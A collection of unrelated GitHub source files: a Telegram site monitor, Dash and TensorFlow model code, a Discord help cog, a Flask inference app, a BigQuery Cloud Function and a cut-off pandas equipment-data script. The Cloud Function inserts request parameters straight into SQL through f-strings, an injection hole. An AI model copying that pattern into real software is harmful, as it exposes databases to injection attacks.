# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import socket
import subprocess
import telepot
import importlib
import time
import sys
import CONFIG
# from multiprocessing.dummy import Pool, Queue # multithreading
import os
from datetime import datetime
import logging
import argparse
import requests
from requests.exceptions import ConnectionError
from systemd.journal import JournalHandler
log = logging.getLogger('EM')
log.addHandler(JournalHandler())
log.setLevel(logging.INFO)
import socket
socket.setdefaulttimeout(20)
# from multiprocessing import Pool # multiprocessing
try:
reload(sys)
sys.setdefaultencoding('utf8')
except NameError:
# for python 3
pass
token = CONFIG.telegram_token
chronic = {
'check_websites': None,
}
def online(host="8.8.8.8", port=53, timeout=3):
"""
Host: 8.8.8.8 (google-public-dns-a.google.com)
OpenPort: 53/tcp
Service: domain (DNS/TCP)
"""
try:
socket.setdefaulttimeout(timeout)
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))
return True
except socket.error as ex:
print(ex)
return False
def check_websites():
'''
gets list from config and tries to connect to websites
'''
output = ''
for url in CONFIG.urls:
try:
returncode = requests.head(url).status_code
if returncode >= 400:
output = output + '- ' + url + ' ' + str(returncode) + '\n'
else:
output = output + '- ' + url + ' ' + str(returncode) + '\n'
except ConnectionError:
output = output + '- ' + url + '\n'
if output == chronic['check_websites']:
print('Nothing new… preventing spam.')
chronic['check_websites'] = output
return True, ''
else:
chronic['check_websites'] = output
return False, output
checks = [
check_websites,
]
def run(bot=None, debug=False):
if not bot:
print('No BOT defined')
return
while True:
bot.getMe()['username']
if online():
for check in checks:
success, msg = check()
if not success:
if debug:
print(msg)
else:
bot.sendMessage(17036700, msg)
else:
print('No internet Connection.')
time.sleep(60)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='''
This is EM will do checks and message you via Telegram if a check got something
'''
)
parser.add_argument(
'-d',
'--debug',
action='store_true',
dest='debug',
help='''Enables Debug Mode'''
)
args = parser.parse_args()
debug = False
bot = None
if args.debug:
print('DEBUG MODE ON')
debug = True
if CONFIG.telegram_token:
bot = telepot.Bot(CONFIG.telegram_token)
else:
print('Got no token from config…DEBUG MODE ON')
debug = True
run(bot, debug)
| Stakdek/EM | em.py | em.py | py | 3,939 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "systemd.journal.JournalHandler",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "so... |
36714543817 | from dash import html, dcc
from dash.development.base_component import Component
from datafiles.views.view import View, DfView
from dataviz.irenderer import IDataStudyRenderer
import plotly.express as px
from dataviz.src.components.iplot import IPlot
class BubbleChart(IPlot):
_name = "bubble-chart"
@classmethod
def name(cls) -> str:
return cls._name
@staticmethod
def new(plot_id: str, renderer: IDataStudyRenderer, source: View, *args,
**kwargs) -> Component:
plot_name = kwargs.get("plot_name", source.name)
if isinstance(source, DfView):
data = source.data
size = kwargs.pop("size", None)
color = kwargs.pop("color", None)
hover_name = kwargs.pop("hover_name", None)
for arg in [size, color, hover_name]:
if arg not in data.columns and arg is not None:
raise ValueError(f"Column {arg} not found")
x_col = kwargs.pop("x_col", source.data.columns[0])
y_col = kwargs.pop("y_col",
[col for col in data.columns if col != x_col])
else:
raise NotImplementedError()
layout = kwargs.pop("layout", {})
fig = px.scatter(
data_frame=data, x=x_col, y=y_col,
size=size, color=color, hover_name=hover_name,
title="Graph with Column Selection"
)
layout.update(
xaxis={'title': x_col if x_col else "x"},
yaxis={'title': ', '.join(y_col) if y_col else "y"},
template='plotly_dark',
plot_bgcolor='rgba(0, 0, 0, 0)',
paper_bgcolor='rgba(0, 0, 0, 0)',
)
fig.update_layout(layout)
plot = html.Div(
className="plot",
children=[
html.Div(
children=IPlot.get_header(plot_id, plot_name)
),
dcc.Graph(id=f"{source.name}_{plot_id}_graph", figure=fig),
]
)
return plot
@staticmethod
def config_panel(selected_view: View) -> list[Component]:
if isinstance(selected_view, DfView):
return (
IPlot.html_dropdown("X column", 0,
selected_view.data.columns) +
IPlot.html_dropdown("Y column", 1,
selected_view.data.columns) +
IPlot.html_dropdown("Size column", 2,
selected_view.data.columns) +
IPlot.html_dropdown("Color column", 3,
selected_view.data.columns)
)
raise NotImplementedError()
@staticmethod
def are_plot_args_valid(plot_args: list, selected_view: View) -> bool:
return all(plot_args[:3]) and plot_args
@staticmethod
def from_config(plot_id: str, renderer: IDataStudyRenderer, plot_args: list,
selected_view: View):
return BubbleChart.new(plot_id, renderer, selected_view,
x_col=plot_args[0], y_col=plot_args[1],
size=plot_args[2], color=plot_args[3])
| adangreputationsquad/theriver | dataviz/src/components/bubble_charts.py | bubble_charts.py | py | 3,249 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dataviz.src.components.iplot.IPlot",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "dataviz.irenderer.IDataStudyRenderer",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "datafiles.views.view.View",
"line_number": 18,
"usage_type": "nam... |
18526461373 | from keras.models import Model
from keras.layers.recurrent import LSTM
from keras.layers import Dense, Input, Embedding
from keras.preprocessing.sequence import pad_sequences
from keras.callbacks import ModelCheckpoint
from collections import Counter
import nltk
import numpy as np
from sklearn.model_selection import train_test_split
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os
import glob
np.random.seed(42)
## Change the directory addresses, hidden units and test dataset ####
HIDDEN_UNITS = 50
TESTING_DATASET = 'dlgs_trial5.txt'
WEIGHTS_DIRECTORY_NAME = 'dlgs_trial5'
CWD = os.getcwd()
FINAL_RESULTS_FILE = CWD+'/'+WEIGHTS_DIRECTORY_NAME+'_all_weights.txt'
c= np.load('word-context.npy')
context = c.item()
num_encoder_tokens = context['num_encoder_tokens']
num_decoder_tokens = context['num_decoder_tokens']
encoder_max_seq_length = context['encoder_max_seq_length']
decoder_max_seq_length = context['decoder_max_seq_length']
input_word2idx1 = np.load('input-word2idx.npy')
input_word2idx = input_word2idx1.item()
input_idx2word1 = np.load('input-idx2word.npy')
input_idx2word = input_idx2word1.item()
target_word2idx1 = np.load('target-word2idx.npy')
target_word2idx = target_word2idx1.item()
target_idx2word1 = np.load('target-idx2word.npy')
target_idx2word = target_idx2word1.item()
##========NETWORK ARCHITECTURE===================================
encoder_inputs = Input(shape=(None,), name='encoder_inputs')
encoder_embedding = Embedding(input_dim=num_encoder_tokens, output_dim=HIDDEN_UNITS,
input_length=encoder_max_seq_length, name='encoder_embedding')
encoder_lstm = LSTM(units=HIDDEN_UNITS, return_state=True, name='encoder_lstm')
encoder_outputs, encoder_state_h, encoder_state_c = encoder_lstm(encoder_embedding(encoder_inputs))
encoder_states = [encoder_state_h, encoder_state_c]
decoder_inputs = Input(shape=(None, num_decoder_tokens), name='decoder_inputs')
decoder_lstm = LSTM(units=HIDDEN_UNITS, return_state=True, return_sequences=True, name='decoder_lstm')
decoder_outputs, decoder_state_h, decoder_state_c = decoder_lstm(decoder_inputs,
initial_state=encoder_states)
decoder_dense = Dense(units=num_decoder_tokens, activation='softmax', name='decoder_dense')
decoder_outputs = decoder_dense(decoder_outputs)
model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
## =============== DECODER FUNCTION ===========================
def decode_sequence(input_text):
input_seq = []
input_wids = []
for word in nltk.word_tokenize(input_text):
idx = 1 # default [UNK]
if word in input_word2idx:
idx = input_word2idx[word]
input_wids.append(idx)
input_seq.append(input_wids)
input_seq = pad_sequences(input_seq, encoder_max_seq_length)
states_value = encoder_model.predict(input_seq)
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, target_word2idx['START']] = 1
target_text = ''
target_text_len = 0
terminated = False
while not terminated:
output_tokens, h, c = decoder_model.predict([target_seq] + states_value)
sample_token_idx = np.argmax(output_tokens[0, -1, :])
sample_word = target_idx2word[sample_token_idx]
target_text_len += 1
if sample_word != 'START' and sample_word != 'END':
target_text += ' ' + sample_word
if sample_word == 'END' or target_text_len >= decoder_max_seq_length:
terminated = True
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sample_token_idx] = 1
states_value = [h, c]
return target_text.strip()
##========== Load Weight File ========= ####
os.chdir(WEIGHTS_DIRECTORY_NAME)
if os.path.isfile(FINAL_RESULTS_FILE):
os.remove(FINAL_RESULTS_FILE)
output_file = open(FINAL_RESULTS_FILE,'a')
weight_files = glob.glob('*.h5')
for weight_file in weight_files:
model.load_weights(weight_file)
output_file.write("\n==========================================")
output_file.write("\n\t"+weight_file)
output_file.write("\n==========================================")
encoder_model = Model(encoder_inputs, encoder_states)
decoder_state_inputs = [Input(shape=(HIDDEN_UNITS,)), Input(shape=(HIDDEN_UNITS,))]
decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
with open(TESTING_DATASET, 'r', encoding='utf-8') as f:
lines1 = f.read().split('\n')
length_of_file= sum(1 for line in open(TESTING_DATASET))
for line in lines1[: min(length_of_file,len(lines1) - 1)]:
input_text, target_text = line.split('\t')
decoded_sentence = decode_sequence(input_text)
user_input = 'Input sentence:'+input_text
bot_output = 'Decoded sentence:'+decoded_sentence
# print('-')
# print(user_input)
# print(bot_output)
output_file.write("\n-")
output_file.write('\n'+user_input)
output_file.write('\n'+bot_output)
print('Tested with weights in : ', weight_file)
output_file.close()
| sbarham/dsrt | Trial/fred_testing.py | fred_testing.py | py | 5,473 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"l... |
27515698765 | from discord.ext import commands
import discord
import random
class HelpCog(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['хелп'])
async def help(self, ctx):
prefix = '!'
emb = discord.Embed(title='Команды сервера: ', description=f'`{prefix}help`', color=discord.Color(random.randint(0x000000, 0xFFFFFF)), inline=False)
emb.set_thumbnail(url=self.bot.user.avatar_url)
emb.add_field(name='Модерация: только для роли [Админ] ',
value=f'`{prefix}clear` `{prefix}add_role` `{prefix}ban` `{prefix}mute` `{prefix}unmute` `{prefix}call`',
inline=False)
emb.add_field(name='Развлечения: ',
value=f'`{prefix}cat` `{prefix}quote`',
inline=False)
emb.add_field(name='Прочее: ',
value=f'`{prefix}info` `{prefix}my_info`',
inline=False)
await ctx.send(embed=emb)
def setup(bot):
bot.add_cog(HelpCog(bot)) | RuCybernetic/CyberTyanBot | cogs/commands/Help.py | Help.py | py | 1,104 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "discord.ext.commands.Cog",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "discord.ext.commands",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "discord.Embed",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "discor... |
35941249520 | import os
import sys
import inference
import storage
import boto3
# Flask
from flask import Flask, redirect, url_for, request, render_template, Response, jsonify, redirect
from werkzeug.utils import secure_filename
from gevent.pywsgi import WSGIServer
# Some utilites
import numpy as np
from util import base64_to_pil
TCP_PORT = 5000
aws_access_key_id=''
aws_secret_access_key=''
# Declare a flask app
app = Flask(__name__)
s3 = boto3.client('s3',aws_access_key_id = aws_access_key_id, aws_secret_access_key = aws_secret_access_key)
inference_handler = inference.Inference(s3)
print('Model loaded. Check http://127.0.0.1:'+str(TCP_PORT))
@app.route('/', methods=['GET'])
def index():
# Main page
return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def predict():
if request.method == 'POST':
img = base64_to_pil(request.json)
hash_value = str(hex(hash(img.tobytes())))
response = inference_handler.predict(img)
storage.temp_store(hash_value, img)
return jsonify(result=response, hash_value=hash_value)
return None
@app.route('/feedback', methods=['GET', 'POST'])
def feedback():
global s3
if request.method == 'POST':
hash_value = request.json['hash_value']
correct_label = str.lower(request.json['label'])
if(correct_label in inference_handler.classes):
storage.copy_file(correct_label, hash_value)
storage.remove_file(hash_value)
resp = jsonify(success=True)
return resp
return None
if __name__ == '__main__':
http_server = WSGIServer(('0.0.0.0', TCP_PORT), app)
http_server.serve_forever()
| pingyuanw/293B | app.py | app.py | py | 1,691 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "inference.Inference",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
... |
22169703217 | from flask import make_response
from google.cloud import bigquery
# my modules
import config
from my_logging import getLogger
log = getLogger(__name__)
config = config.Config()
with open('auth.txt', 'r') as f:
cf_token = f.readline().rstrip('\r\n')
# entry point of Cloud Functions
# trigger = http
def atm_iv_data(request):
if not check_auth(request):
return 'Forbidden', 403
num_days = request.args.get('d', default='7')
n_th_contract_month = request.args.get('n', default='0')
df = query_atm_iv(num_days, n_th_contract_month)
# CSV化
atm_iv_csv = df.to_csv(index=False, header=False)
res = make_response(atm_iv_csv, 200)
res.headers['Content-type'] = 'text/csv; charset=utf-8'
return res
def query_atm_iv(num_days, n_th_contract_month=0):
table_iv = f'{config.gcp_bq_dataset_name}.atm_iv'
table_option_price = f'{config.gcp_bq_dataset_name}.option_price'
query = (f'''
WITH t1 AS (
SELECT
(ARRAY_AGG(DISTINCT(last_trading_day) IGNORE NULLS ORDER BY last_trading_day ASC))[OFFSET({n_th_contract_month})] AS last_trading_day
FROM
{table_iv}
WHERE
started_at > TIMESTAMP_TRUNC(TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL -10 DAY), DAY)
AND last_trading_day >= CURRENT_DATE('Asia/Tokyo')
), t2 AS (
SELECT
open,high,low,close, started_at
FROM
{table_iv}
WHERE
last_trading_day=(SELECT t1.last_trading_day FROM t1)
AND started_at >= TIMESTAMP_TRUNC(TIMESTAMP_ADD(CURRENT_TIMESTAMP() , INTERVAL -{num_days} DAY), DAY)
), t3 AS (
-- まだ時間足集計が保存されていない分(=UTCでの当日分)の時間足を集計する
SELECT
(array_agg(iv IGNORE NULLS ORDER BY created_at ASC))[OFFSET(0)] open,
MAX(iv) high,
MIN(iv) low,
(array_agg(iv IGNORE NULLS ORDER BY created_at DESC))[OFFSET(0)] close,
TIMESTAMP_SECONDS(CAST(TRUNC(UNIX_SECONDS(created_at)/3600) AS INT64) * 3600) AS started_at
FROM
{table_option_price}
WHERE
created_at >= TIMESTAMP_TRUNC(CURRENT_TIMESTAMP(), DAY)
AND is_atm=True AND type=2 AND last_trading_day=(SELECT t1.last_trading_day FROM t1)
GROUP BY started_at
)
SELECT
open, high, low, close, started_at
FROM
t2
UNION ALL
SELECT
open, high, low, close, started_at
FROM
t3
ORDER BY started_at
''')
client = bigquery.Client()
query_job = client.query(query)
rows = query_job.result()
df = rows.to_dataframe()
return df
def check_auth(request):
auth_header = request.headers.get("Authorization")
req_cf_token = None
if auth_header is not None:
req_cf_token = auth_header.split(' ')[1]
return req_cf_token == cf_token
if __name__ == '__main__':
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def index():
return atm_iv_data(request)
app.run('127.0.0.1', 8000, debug=True)
| terukusu/optionchan-gcp | functions_py/atm_iv/main.py | main.py | py | 3,306 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "my_logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "config.Config",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask.make_response",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "config.gcp_bq_da... |
1292570084 | import tensorflow as tf
from pathlib import Path
import numpy as np
import dataset
import tensorflow_probability as tfp
tfd = tfp.distributions
class Encoder:
def __init__(self, latent_size):
super(Encoder, self).__init__()
# static parameters
self.latent_size = latent_size
self.num_channels = 1
self.dimensionality = 3
self.fmap_base = 4096
self.fmap_max = 512
# dynamic parameters
self.current_resolution = 1
self.current_width = 2 ** self.current_resolution
self.growing_encoder = self.make_Ebase(nf=self._nf(1))
self.train_encoder = tf.keras.Sequential(self.growing_encoder,name='sequential')
def update_res(self):
self.current_resolution += 1
self.current_width = 2 ** self.current_resolution
def make_Ebase(self,nf):
images = tf.keras.layers.Input(shape= (2,)*self.dimensionality + (nf,), name='images_2iso')
# Final dense layer
x = tf.keras.layers.Flatten()(images)
x = tf.keras.layers.Dense(2*self.latent_size,activation=None)(x)
return tf.keras.models.Model(inputs=[images], outputs=[x], name='z_params')
def make_Eblock(self,name,nf):
# on fait cette approche car on ne sait pas la taille donc on met pas un input
block_layers = []
#block_layers.append(tf.keras.layers.Convolution3D(nf, kernel_size=3, strides=1, padding='same'))
#block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu))
block_layers.append(tf.keras.layers.Convolution3D(nf, kernel_size=4, strides=2, padding='same')) # check padding
block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu))
return tf.keras.models.Sequential(block_layers, name=name)
def _nf(self, stage):
# computes number of filters for each layer
return min(int(self.fmap_base / (2.0 ** (stage))), self.fmap_max)
def _weighted_sum(self):
return tf.keras.layers.Lambda(lambda inputs : (1-inputs[2])*inputs[0] + (inputs[2])*inputs[1])
def add_resolution(self):
# Add resolution
self.update_res()
# Gan images
images = tf.keras.layers.Input(shape=(self.current_width,)*self.dimensionality+ (self.num_channels,),name = 'GAN_images')
alpha = tf.keras.layers.Input(shape=[], name='e_alpha')
# Compression block
name = 'block_{}'.format(self.current_resolution)
e_block = self.make_Eblock(name=name,nf=self._nf(self.current_resolution-1))
# Channel compression
from_rgb_1 = tf.keras.layers.AveragePooling3D()(images)
from_rgb_1 = tf.keras.layers.Conv3D(self._nf(self.current_resolution-1), kernel_size=1, padding='same', name='from_rgb_1')(from_rgb_1)
from_rgb_2 = tf.keras.layers.Conv3D(self._nf(self.current_resolution), kernel_size=1, padding='same', name='from_rgb_2')(images)
from_rgb_2 = e_block(from_rgb_2)
lerp_input = self._weighted_sum()([from_rgb_1, from_rgb_2, alpha]) # RANDOM ALPHA
# Getting latent code
e_z = self.growing_encoder(lerp_input)
# Updating the model
self.growing_encoder = tf.keras.Sequential([e_block,self.growing_encoder]) # without channel compression
self.train_encoder = tf.keras.Model(inputs=[images,alpha],outputs=[e_z]) # with channel compression
class Decoder():
def __init__(self, latent_size, generator_folder):
super(Decoder, self).__init__()
# static parameters
self.latent_size = latent_size
self.model_folder = generator_folder
# dynamic parameters
self.current_resolution = 1
self.current_width = 2** self.current_resolution
self.decoder = None
def get_model(self,folder,res):
# find the model for the appropriate resolution
path = Path(folder)
return str(list(path.glob('g_{}.h5'.format(res)))[0].resolve()) # check if single one
def update_res(self):
self.current_resolution += 1
self.current_width = 2 ** self.current_resolution
def make_Dblock(self,name):
block_layers = []
block_layers.append(tf.keras.layers.Flatten()) # obligé ??
block_layers.append(tf.keras.layers.Dense(self.current_width**3))
block_layers.append(tf.keras.layers.Reshape((self.current_width,self.current_width,self.current_width),input_shape=(self.current_width**3,)))
#block_layers.append(tf.keras.layers.Activation(tf.nn.leaky_relu)) - depends on expression of NLL loss
return tf.keras.models.Sequential(block_layers, name=name)
def add_resolution(self):
self.update_res()
if self.current_resolution > 2:
latent = tf.keras.layers.Input(shape=self.latent_size)
alpha = tf.keras.layers.Input(shape=[], name='d_alpha')
common = tf.keras.models.load_model(self.get_model(self.model_folder,self.current_resolution), custom_objects={'leaky_relu': tf.nn.leaky_relu}, compile=True)([latent,alpha])
shape = tf.shape(common)
common = tf.reshape(common,[shape[0],common.shape[1],common.shape[2],common.shape[3]])
mu = self.make_Dblock(name='mu_block')(common)
sigma = self.make_Dblock(name='sigma_block')(common)
self.decoder = tf.keras.Model(inputs=[latent,alpha],outputs=[mu,sigma])
self.decoder.trainable = True
def get_decoder(self):
return self.decoder
def get_currentres(self):
return self.current_resolution
class Generator():
def __init__(self, latent_size, generator_folder):
super(Generator,self).__init__()
#static parameters
self.latent_size = latent_size # LOOK UP WHAT SIZE
self.model_folder = generator_folder
# dynamic
self.current_resolution = 1
self.current_width = 2**3
self.generator = None
def get_model(self,folder,res):
# find the model for the appropriate resolution
path = Path(folder)
try:
return str(list(path.glob('**/g_{}.h5'.format(res)))[0].resolve())
except: print('No pretrained model for this resolution')
def update_res(self):
self.current_resolution += 1
self.current_width = 2 ** self.current_resolution
def add_resolution(self):
self.update_res()
if self.current_resolution > 2:
self.generator = tf.keras.models.load_model(self.get_model(self.model_folder,self.current_resolution), custom_objects={'leaky_relu': tf.nn.leaky_relu}, compile=True)
self.generator.trainable = False
def generate_latents(self,num_samples):
latents = []
for i in range(num_samples):
latent = tf.random.normal((1, self.latent_size))
latents.append(latent)
return latents | alicebizeul/progressiveAE | Vnetworks.py | Vnetworks.py | py | 6,915 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow_probability.distributions",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.Sequential",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 25,
"usage_type": "attribute"
},... |
22781218068 | import pandas as pd
from extensions import extensions
from initial_values.initial_values import be_data_columns_to_master_columns, year_dict
from datetime import datetime
from dateutil.relativedelta import relativedelta
from initial_values.initial_values import sap_user_status_cons_status_list, be_data_cons_status_list, sap_system_status_ban_list, operaton_status_translation, master_data_to_ru_columns, month_dict
import sqlite3
from openpyxl.utils.dataframe import dataframe_to_rows
import openpyxl
db = extensions.db
plug = 'plug'
date_time_plug = '1.1.2199'
date_time_plug = datetime.strptime(date_time_plug, '%d.%m.%Y')
# наименование итераций
iterations = {
"Дата вывода 0 - итерация продления": "iteration_0",
"Дата вывода 1 - итерация продления": "iteration_1",
"Дата вывода 1 - итерация продления (корр 23.06.22)": "iteration_1_1",
"Дата вывода 2 - итерация продления (корр 30.06.22)": "iteration_2"
}
iterations_list = ["operation_finish_date_iteration_0", "operation_finish_date_iteration_1", "operation_finish_date_iteration_2"]
iterations_dict = {
# "operation_finish_date_iteration_0":"Дата вывода 0 - итерация продления",
# "operation_finish_date_iteration_1":"Дата вывода 1 - итерация продления",
"operation_finish_date_iteration_2":"Дата вывода 2 - итерация продления"
}
def read_be_2_eo_xlsx():
# читаем загруженный файл
be_eo_raw_data = pd.read_excel('uploads/be_eo_2_data.xlsx', sheet_name='be_eo_data', index_col = False)
be_eo_data = be_eo_raw_data.rename(columns=be_data_columns_to_master_columns)
# список колонок
update_eo_column_list = list(be_eo_data.columns)
be_eo_data['eo_code'] = be_eo_data['eo_code'].astype(str)
be_eo_data['operation_finish_date_iteration_0'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_0'], format='%d.%m.%Y')
be_eo_data['operation_finish_date_iteration_1'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_1'], format='%d.%m.%Y')
be_eo_data['operation_finish_date_iteration_2'] = pd.to_datetime(be_eo_data['operation_finish_date_iteration_2'], format='%d.%m.%Y')
be_eo_data['conservation_start_date'] = pd.to_datetime(be_eo_data['conservation_start_date'], format='%d.%m.%Y')
be_eo_data['conservation_finish_date'] = pd.to_datetime(be_eo_data['conservation_finish_date'], format='%d.%m.%Y')
be_eo_data['repair_start_date'] = pd.to_datetime(be_eo_data['repair_start_date'], format='%d.%m.%Y')
be_eo_data['repair_finish_date'] = pd.to_datetime(be_eo_data['repair_finish_date'], format='%d.%m.%Y')
# пишем заглушки в поля conservation_finish_date, repair_start_date, repair_finish_date
be_eo_data['conservation_finish_date'].fillna(date_time_plug, inplace = True)
# получаем данные из мастер-файла
con = sqlite3.connect("database/datab.db")
cursor = con.cursor()
# sql = "SELECT * FROM eo_DB JOIN be_DB"
sql = "SELECT \
eo_DB.eo_code, \
eo_DB.temp_eo_code, \
eo_DB.temp_eo_code_status, \
eo_DB.be_code, \
eo_DB.head_type, \
be_DB.be_description, \
eo_DB.eo_class_code, \
eo_class_DB.eo_class_description, \
models_DB.eo_model_name, \
models_DB.eo_category_spec, \
models_DB.type_tehniki, \
models_DB.marka_oborudovania, \
models_DB.cost_center, \
eo_DB.eo_model_id, \
eo_DB.eo_description, \
eo_DB.gar_no, \
eo_DB.constr_type, \
eo_DB.constr_type_descr, \
eo_DB.operation_start_date, \
eo_DB.expected_operation_period_years, \
eo_DB.operation_finish_date_calc, \
eo_DB.sap_planned_finish_operation_date, \
eo_DB.operation_finish_date_sap_upd, \
eo_DB.sap_system_status, \
eo_DB.sap_user_status, \
eo_DB.prodlenie_2022, \
eo_DB.custom_eo_status \
FROM eo_DB \
LEFT JOIN models_DB ON eo_DB.eo_model_id = models_DB.eo_model_id \
LEFT JOIN be_DB ON eo_DB.be_code = be_DB.be_code \
LEFT JOIN eo_class_DB ON eo_DB.eo_class_code = eo_class_DB.eo_class_code \
LEFT JOIN operation_statusDB ON eo_DB.expected_operation_status_code = operation_statusDB.operation_status_code"
master_eo_df = pd.read_sql_query(sql, con)
# подменяем временнные номера
master_eo_df_temp_eo = master_eo_df.loc[master_eo_df['temp_eo_code_status']=='temp_eo_code']
indexes_temp_eo = list(master_eo_df_temp_eo.index.values)
# print(master_eo_df_temp_eo['temp_eo_code'])
# print(list(master_eo_df_temp_eo.loc[indexes_temp_eo, ['temp_eo_code']]))
master_eo_df.loc[indexes_temp_eo, ['eo_code']] = master_eo_df_temp_eo['temp_eo_code']
# print(master_eo_df.loc[indexes_temp_eo, ['eo_code']])
# print('должен быть список', master_eo_df.loc[indexes_temp_eo, ['eo_code']])
master_eo_df = master_eo_df.loc[master_eo_df['head_type']=='head']
master_eo_df['operation_start_date'] = pd.to_datetime(master_eo_df['operation_start_date'])
master_eo_df['operation_start_date_month'] = ((master_eo_df['operation_start_date'] + pd.offsets.MonthEnd(0) - pd.offsets.MonthBegin(1)).dt.floor('d'))
master_eo_df['sap_planned_finish_operation_date'] = pd.to_datetime(master_eo_df['sap_planned_finish_operation_date'])
master_eo_df['operation_finish_date_sap_upd'] = pd.to_datetime(master_eo_df['operation_finish_date_sap_upd'])
# джойним данные из файла с мастер-данными
be_master_data = pd.merge(master_eo_df, be_eo_data, on='eo_code', how='left')
#### обновление даты завершения из колонки Итерации
for iteration, iteration_rus in iterations_dict.items():
be_master_data[iteration] = pd.to_datetime(be_master_data[iteration])
be_master_data[iteration].fillna(date_time_plug, inplace = True)
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date_sap_upd']
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date'].dt.date
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date_sap_upd']
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date'].dt.date
be_master_data[iteration] = be_master_data[iteration].dt.date
be_master_data_temp = be_master_data.loc[be_master_data[iteration]!=date_time_plug.date()]
indexes = list(be_master_data_temp.index.values)
be_master_data.loc[indexes, ['operation_finish_date']] = be_master_data_temp[iteration]
be_master_data['operation_finish_date'] = pd.to_datetime(be_master_data['operation_finish_date'])
be_master_data['operation_finish_date_month'] = ((be_master_data['operation_finish_date'] + pd.offsets.MonthEnd(0) - pd.offsets.MonthBegin(1)).dt.floor('d'))
result_data_list = []
i=0
lenght = len(be_master_data)
be_master_data['repair_start_date'].fillna(date_time_plug, inplace = True)
be_master_data['repair_finish_date'].fillna(date_time_plug, inplace = True)
be_master_data['os'].fillna(plug, inplace = True)
# be_master_data.to_csv('temp_data/be_master_data_delete.csv')
be_master_data = be_master_data.loc[be_master_data['custom_eo_status'] != 'delete']
for row in be_master_data.itertuples():
i=i+1
# print("eo ", ", ", i, " из ", lenght)
eo_code = getattr(row, 'eo_code')
be_code = getattr(row, 'be_code')
be_description = getattr(row, 'be_description')
eo_class_code = getattr(row, 'eo_class_code')
eo_class_description = getattr(row, 'eo_class_description')
eo_model_name = getattr(row, 'eo_model_name')
# eo_model_id = getattr(row, 'eo_model_id')
eo_category_spec = getattr(row, 'eo_category_spec')
type_tehniki = getattr(row, 'type_tehniki')
marka_oborudovania = getattr(row, 'marka_oborudovania')
eo_description = getattr(row, "eo_description")
gar_no = getattr(row, "gar_no")
constr_type = getattr(row, "constr_type")
constr_type_descr = getattr(row, "constr_type_descr")
os = getattr(row, "os")
# operation_status_rus = getattr(row, "operation_status")
sap_user_status = getattr(row, "sap_user_status")
sap_system_status = getattr(row, "sap_system_status")
cost_center = getattr(row, "cost_center")
operation_status_from_file = getattr(row, "operation_status") # статус, полученный из файла
operation_start_date = getattr(row, 'operation_start_date')
operation_start_date_month = getattr(row, 'operation_start_date_month')
expected_operation_period_years = getattr(row, 'expected_operation_period_years')
operation_finish_date_calc = getattr(row, 'operation_finish_date_calc')
sap_planned_finish_operation_date = getattr(row, 'sap_planned_finish_operation_date')
operation_finish_date_sap_upd = getattr(row, 'operation_finish_date_sap_upd')
# operation_finish_date_update_iteration = getattr(row, iteration)
operation_finish_date = getattr(row, 'operation_finish_date')
operation_finish_date_month = getattr(row, 'operation_finish_date_month')
conservation_start_date = getattr(row, 'conservation_start_date')
repair_start_date = getattr(row, 'repair_start_date')
repair_finish_date = getattr(row, 'repair_finish_date')
custom_eo_status = getattr(row, 'custom_eo_status')
# сначала определяем статус ввода в эксплуатацию
status_condition_dict = {
"new":"Ввод нового",
"on_balance":"На балансе",
"conservation":"Консервация",
"remake":"Переоборудование",
